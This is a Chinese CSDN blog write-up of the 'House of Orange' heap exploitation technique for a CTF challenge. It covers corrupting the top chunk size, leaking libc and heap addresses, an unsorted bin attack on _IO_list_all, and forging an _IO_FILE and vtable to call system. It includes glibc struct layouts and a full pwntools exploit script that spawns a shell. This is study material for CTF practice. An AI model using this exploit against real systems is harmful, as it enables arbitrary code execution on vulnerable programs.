house of orange

最新推荐文章于 2024-09-06 12:15:57 发布
最新推荐文章于 2024-09-06 12:15:57 发布
阅读量152 收藏 2
点赞数
分类专栏: # glibc 2.24 文章标签: c# c++ linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46441427/article/details/120784173
版权

house of orange是一道同名题的技术
先看一下保护机制,是保护全开的
在这里插入图片描述
一般做堆题先泄露libc的地址,但是这里没有free
这里有个思路
修改top chunk的size值,然后malloc一个比这个大的chunk,然后系统调用sysmalloc分配堆,最后top chunk就会被释放,放入unsorted bin,相当于可以达到free一个堆块的效果了
可以看到我们已经成功泄露出main arena
在这里插入图片描述
然后再edit0x10个字节,就可以打印出堆地址

在这里插入图片描述
介绍一下_IO_file的逻辑关系
_IO_file_plus结构包含_IO_file和vtable指针

struct _IO_FILE_plus
{
  _IO_FILE file;
  const struct _IO_jump_t *vtable;
};

这是_IO_FILE结构

struct _IO_FILE {
  int _flags;       /* High-order word is _IO_MAGIC; rest is flags. */
#define _IO_file_flags _flags

  /* The following pointers correspond to the C++ streambuf protocol. */
  /* Note:  Tk uses the _IO_read_ptr and _IO_read_end fields directly. */
  char* _IO_read_ptr;   /* Current read pointer */
  char* _IO_read_end;   /* End of get area. */
  char* _IO_read_base;  /* Start of putback+get area. */
  char* _IO_write_base; /* Start of put area. */
  char* _IO_write_ptr;  /* Current put pointer. */
  char* _IO_write_end;  /* End of put area. */
  char* _IO_buf_base;   /* Start of reserve area. */
  char* _IO_buf_end;    /* End of reserve area. */
  /* The following fields are used to support backing up and undo. */
  char *_IO_save_base; /* Pointer to start of non-current get area. */
  char *_IO_backup_base;  /* Pointer to first valid character of backup area */
  char *_IO_save_end; /* Pointer to end of non-current get area. */

  struct _IO_marker *_markers;

  struct _IO_FILE *_chain;

  int _fileno;
#if 0
  int _blksize;
#else
  int _flags2;
#endif
  _IO_off_t _old_offset; /* This used to be _offset but it's too small.  */

#define __HAVE_COLUMN /* temporary */
  /* 1+column number of pbase(); 0 is unknown. */
  unsigned short _cur_column;
  signed char _vtable_offset;
  char _shortbuf[1];

  /*  char* _save_gptr;  char* _save_egptr; */

  _IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};

通过chain字段会把所有的_IO_FILE_plus结构连接起来,然后由一个_IO_FILE_PLUS* _IO_list_all来做表头,通过_IO_list_all就可以遍历所有_IO_FILE结构
然后利用unsorted bin修改_IO_LIST_ALL指针,根据下面的规则

/* remove from unsorted list */  
unsorted_chunks (av)->bk = bck;  
bck->fd = unsorted_chunks (av);

可以得到malloc_state和unsorted bin里面是这样连接的
在这里插入图片描述
此时因为IO_list_all指向了main_arena+0x58所以mian_arena + 0x58会被看成一个IO_FILE_PLUS的结构
IO_file_plus结构有一个_chain字段,指向下一个_IO_FILE_PLUS结构,偏移是IO_FILE_PLUS+0x68,所以_chain的位置在:main_arena+0x58 + 0x68 = main_arena + 0xC0处
因为main_arena不是完全可控的,所以修改chain字段指向下一个构造的_IO_FIle_plus
在这里插入图片描述
然后这个chain在_IO_FILE中的偏移是0x68,而我们的main_arena+0x58正好就是small bin存放0x60大小的位置,所以可以将已经在unsorted bin中的chunk_size改为0x60,那么在下一次malloc的时候,因为在其他bin中都没有合适的chunk,malloc将会进入大循环,把unsorted bin中的chunk放回到对应的small bin或large bin中
当_IO_flush_all_lockp函数通过fp->_chain寻找下一个_IO_FILE时,就会寻找到smallbin 0x60中的chunk。
只要在这个chunk中伪造好_IO_FILE结构体以及vtable,把_IO_OVERFLOW设置为system函数或者one_gadget就可以getshell
这是我们构造结构时所需要的表

_IO_FILE_plus = {
	'i386':{
		0x0:'_flags',
		0x4:'_IO_read_ptr',
		0x8:'_IO_read_end',
		0xc:'_IO_read_base',
		0x10:'_IO_write_base',
		0x14:'_IO_write_ptr',
		0x18:'_IO_write_end',
		0x1c:'_IO_buf_base',
		0x20:'_IO_buf_end',
		0x24:'_IO_save_base',
		0x28:'_IO_backup_base',
		0x2c:'_IO_save_end',
		0x30:'_markers',
		0x34:'_chain',
		0x38:'_fileno',
		0x3c:'_flags2',
		0x40:'_old_offset',
		0x44:'_cur_column',
		0x46:'_vtable_offset',
		0x47:'_shortbuf',
		0x48:'_lock',
		0x4c:'_offset',
		0x54:'_codecvt',
		0x58:'_wide_data',
		0x5c:'_freeres_list',
		0x60:'_freeres_buf',
		0x64:'__pad5',
		0x68:'_mode',
		0x6c:'_unused2',
		0x94:'vtable'
	},

	'amd64':{
		0x0:'_flags',
		0x8:'_IO_read_ptr',
		0x10:'_IO_read_end',
		0x18:'_IO_read_base',
		0x20:'_IO_write_base',
		0x28:'_IO_write_ptr',
		0x30:'_IO_write_end',
		0x38:'_IO_buf_base',
		0x40:'_IO_buf_end',
		0x48:'_IO_save_base',
		0x50:'_IO_backup_base',
		0x58:'_IO_save_end',
		0x60:'_markers',
		0x68:'_chain',
		0x70:'_fileno',
		0x74:'_flags2',
		0x78:'_old_offset',
		0x80:'_cur_column',
		0x82:'_vtable_offset',
		0x83:'_shortbuf',
		0x88:'_lock',
		0x90:'_offset',
		0x98:'_codecvt',
		0xa0:'_wide_data',
		0xa8:'_freeres_list',
		0xb0:'_freeres_buf',
		0xb8:'__pad5',
		0xc0:'_mode',
		0xc4:'_unused2',
		0xd8:'vtable'
	}
}

这是vtable

struct _IO_jump_t
{
    JUMP_FIELD(size_t, __dummy);
    JUMP_FIELD(size_t, __dummy2);
    JUMP_FIELD(_IO_finish_t, __finish);
    JUMP_FIELD(_IO_overflow_t, __overflow);
    JUMP_FIELD(_IO_underflow_t, __underflow);
    JUMP_FIELD(_IO_underflow_t, __uflow);
    JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
    /* showmany */
    JUMP_FIELD(_IO_xsputn_t, __xsputn);
    JUMP_FIELD(_IO_xsgetn_t, __xsgetn);
    JUMP_FIELD(_IO_seekoff_t, __seekoff);
    JUMP_FIELD(_IO_seekpos_t, __seekpos);
    JUMP_FIELD(_IO_setbuf_t, __setbuf);
    JUMP_FIELD(_IO_sync_t, __sync);
    JUMP_FIELD(_IO_doallocate_t, __doallocate);
    JUMP_FIELD(_IO_read_t, __read);
    JUMP_FIELD(_IO_write_t, __write);
    JUMP_FIELD(_IO_seek_t, __seek);
    JUMP_FIELD(_IO_close_t, __close);
    JUMP_FIELD(_IO_stat_t, __stat);
    JUMP_FIELD(_IO_showmanyc_t, __showmanyc);
    JUMP_FIELD(_IO_imbue_t, __imbue);
#if 0
    get_column;
    set_column;
#endif
};


#coding:utf8
from pwn import *
 
sh = process('./houseoforange')
#sh = remote('111.200.241.244',64177)
libc = ELF('./hoo.so')
#libc = ELF('./libc64-2.19.so')
 
_IO_list_all_s = libc.symbols['_IO_list_all']
system_s = libc.sym['system']
 
 
def build(size,name):
   sh.sendlineafter('Your choice :','1')
   sh.sendlineafter('Length of name :',str(size))
   sh.sendafter('Name :',name)
   sh.sendlineafter('Price of Orange:','123')
   sh.sendlineafter('Color of Orange:','1')
 
def show():
   sh.sendlineafter('Your choice :','2')
 
def edit(size,name):
   sh.sendlineafter('Your choice :','3')
   sh.sendlineafter('Length of name :',str(size))
   sh.sendafter('Name:',name)
   sh.sendlineafter('Price of Orange:','123')
   sh.sendlineafter('Color of Orange:','1')

build(0x30,'a'*0x30)
payload = 'a'*0x30 + p64(0) + p64(0x21) + 'b'*0x10 + p64(0) + p64(0xF80)
#overwrite the size of top chunk  
edit(len(payload),payload)
#dump the heap address
build(0x1000,'b')
build(0x400,'c')  
show()  
sh.recvuntil('Name of house : ')  
main_arena_xx = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00'))  
_IO_list_all_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (_IO_list_all_s & 0xFFF)  
libc_base = _IO_list_all_addr - _IO_list_all_s  
system_addr = libc_base + system_s  
print 'libc_base=',hex(libc_base)  
print 'system_addr=',hex(system_addr)  
print '_IO_list_all_addr=',hex(_IO_list_all_addr) 

#泄露堆地址  
edit(0x10,'c'*0x10)  
show()  
sh.recvuntil('c'*0x10)  
heap_addr = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00'))  
heap_base = heap_addr - 0xE0  
print 'heap_base=',hex(heap_base)  

payload = 'a'*0x400
payload += p64(0) + p64(0x21) + 'a'*0x10
fake_file = '/bin/sh\x00' + p64(0x60)#fp and the size of chunk
fake_file += p64(0) + p64(_IO_list_all_addr-0x10)#fd and bk

fake_file += p64(0) + p64(1)#到这就需要过检测,这里的偏移如下图bypass the check of _IO_FILE:_IO_write_base < _IO_write_ptr
#_io_file+0x20:_io_write_base io_file+0x28:_io_write_ptr
fake_file = fake_file.ljust(0xC0,'\x00')#from _flag to mode's padding:0xc0
fake_file += p64(0)*3#overwirte mode and add padding

fake_file += p64(heap_base + 0x5E8)#指的就是它本身vtable的地址以及vtable的dummy成员变量overwrite vtable pointer

fake_file += p64(0)*2# dummy和dummy2
fake_file += p64(system_addr)#成功覆写overflow
payload += fake_file

edit(len(payload),payload)
gdb.attach(sh)
pause()
sh.recv()
sh.sendline('1')
 
sh.interactive()
Akura@lan
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
星盟-pwn-heap2 (tcache attack,house of orange)
qq_65147345的博客
08-08 1263
通过unsorted-bin泄露出libc_base 通过tcache attack申请到malloc_hook的地址 改写为one_gadget
houseoforange_hitcon_2016(House of orange, unsorted bin attack,FSOP)
weixin_44145820的博客
04-27 1567
目录题目分析漏洞利用Exp 题目分析 只有添加,显示,编辑三个功能,没有删除 添加函数,最多只能添加四次,每次添加会依次执行malloc(0x10),malloc(name_size),calloc(8) House结构体如下 在编辑函数中,可以进行堆溢出,因为House没有把name的size保存下来 编辑次数最多为3 漏洞利用 Exp ...
House Of Orange
qq_45595732的博客
11-26 1046
House Of Orange 本质:Unsorted bin attack 和 FSOP造成的组合漏洞利用方式。 House of orange源于一道题目,有时候只用到free top chunk的题目也会被归入该类中。 glibc版本<=2.23情况 特点:不需要free操作 核心原理: 1,获取unsorted bin ​ 在_int_malloc函数中,会依次检验 fastbin、small bins、unsorted bin、large bins 是否可以满足分配要求,因为尺寸问
houseoforange_hitcon_2016
z1r0的博客
03-09 503
houseoforange_hitcon_2016 查看保护 这一题目就是使用house of orange + FSOP来解决 在edit的时候会让用户输入size,这里有一个堆溢出(笔者认为这一题还有一个考点就是逆清楚这个程序,自己增加结构体 这是笔者加的两个结构体,看成这样就行 struct Data{ Info *info; char *name } struct Info{ int price; int color; } 加了这个之后改一下堆块的类型就可以更快的清楚这个程序的结构。 回归
cscctf_2019_final_childrenheap(house of orange)
seaaseesa的博客
04-30 666
cscctf_2019_final_childrenheap 首先,检查一下程序的保护机制 然后用IDA分析一下 Update功能存在一个null off by one 禁用了fastbin,因此不能fastbin attack。那么可以利用house of orange或者large bin attack,个人认为house of orange较为简单一些。 利用null ...
攻防世界PWN之bufoverflow_a题解(house of orange in 2.24&house of Einherjar)
seaaseesa的博客
02-19 975
bufoverflow_a 首先,我们检查一下程序的保护机制 然后,我们用IDA分析一下,是一个经典的增删改查的程序,然后我们看到创建堆时,前两个堆是用malloc创建,后面的堆用calloc创建,这意味着,如果要泄露libc地址,只能靠前两个堆,后面的堆从bin里取出后会清空里面的信息。 Fill功能存在一个null off by one漏洞 我们每次只能对最后创建的那个堆进...
【八芒星计划】 House of Orange
carol2358的博客
09-02 381
文章目录前言CISCN2020 nofree总结 前言 House of Orange是一种用来应对heap题中没有free的情况的方法,通过把top chunk的size改小,然后申请一个大于topchunk的size的chunk来把旧的top chunk放入bin中(可以是fastbin,也可以是unsortedbin) 使用条件有: ①可以修改topchunk的size ②伪造的 size 必须要对齐到内存页 ③size 要大于 MINSIZE(0x10) ④size 要小于之后申请的 chunk.
IO_FILE——FSOP、house of orange
「 虚幻私塾」
01-20 322
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 FSOP 是 File Stream Oriented  Programming 的缩写。所有的 _IO_FILE 结构会由 _chain 字段连接形成一个链表,由 _IO_list_all 来维护。而 FSOP 的核心思想就是劫持通过 _IO_list_all 的值
BUUCTF 2021-10-4 Pwn
m0_56897090的博客
10-04 415
文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffer overflow 0分析EXPXCTF-Mary_Morton分析EXPEXPgift分析EXPfishin
PWN技巧之_IO_FILE结构体利用house of orange
aptx4869_li的博客
02-16 1102
PWN技巧之_IO_FILE结构体利用house of orange
House of orange
tbsqigongzi的博客
08-07 999
题目中不存在 free 函数或其他释放堆块的函数。
借助gdb调试glibc代码学习House of Orange
happylzs2008的专栏
01-07 711
转自:https://bbs.pediy.com/thread-251195.htm house_of_orange https://www.jianshu.com/p/1e45b785efc1 借助gdb调试glibc代码学习House of Orange https://github.com/shellphish/how2heap/blob/master/glibc_2.25/hou...
攻防世界 进阶 houseoforange
yongbaoii的博客
03-12 683
就是house of orange 跟题目名字一摸一样。 保护 绿油油 build 备注一写顿时简单了起来。 结构分析一下。 那orange的颜色要么就是56746,要么就是0到6. see 然后呢这里56746跟30到36输出是不一样的。 upgrade 房子只能申请三个,改也只能改三次。 对修改的大小没有限制,所以就会有堆溢出。 那问题来了,怎么利用? 他没有free函数,这就是标准的house of orange 我们总体的思路是这样的。 创建第一个house,修改top_chunk的siz
the house of orange解析
小强的博客
11-24 2241
先以这个最简单的例子举例: https://github.com/shellphish/how2heap/blob/master/house_of_orange.c 编译生成ELF文件(64位) p1 = malloc(0x400-16); 每次创建堆都是从top chunk上切割堆块,由于top chunk默认是0x21000,因为我们已经申请了0x400大小的堆,所以此时to
4-main
qq_46441427的博客
09-17 105
拿到edit(0x200)的权限
023集—— @字符详解——C#学习笔记
yongshiqq的博客
09-03 398
2、如果你想直接输出双引号“” 比如输出:Blue means "蓝色",那么输出一个"需要输入两个""前面加@就不会错了。string str1 =@"Blue means ""蓝色""";当然还可以这样写:string str2 = "Blue means "蓝色" ";string str1 ="Blue means "蓝色"";比如不加@的字符串,"\\a\n" C#会解释成一个\和一个a再加一个换行,@"\\a\n“ C#会解释成两个\加一个a加一个\加一个n。1、@是取消字符串中的转意符。
C#基础(6)值类型和引用类型
最新发布
a6s686的博客
09-06 297
我想通过这张图,你应该已经明白引用类型和值类型的区别了。内容比较简单。还是那句话,戒骄戒躁,学习要脚踏实地。请期待我下一篇博客。
退火吗?C#/WinForm演示退火算法
ftfmatlab的博客
09-04 395
算法开始时,初始温度设置得较高,允许算法在大范围内随机搜索解空间,以跳出局部最优解。随着温度逐渐降低,搜索过程变得越来越局部化,最终在低温下稳定在某个解附近,这个解通常是全局最优解或近似全局最优解。退火过程:假设定义域内随机点x0,相当于一个粒子,它会进行无序运动,也就是向左或者向右移动,移动幅度与和当前温度T有关,温度T越大,移动幅度越大,温度T越小,移动幅度就越小。如上图,起始点x0,那么x=x0,下一个随机点是x1,如果求最大值,fx1>fx0,此时需要更新状态,x=x1,y=fx1。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值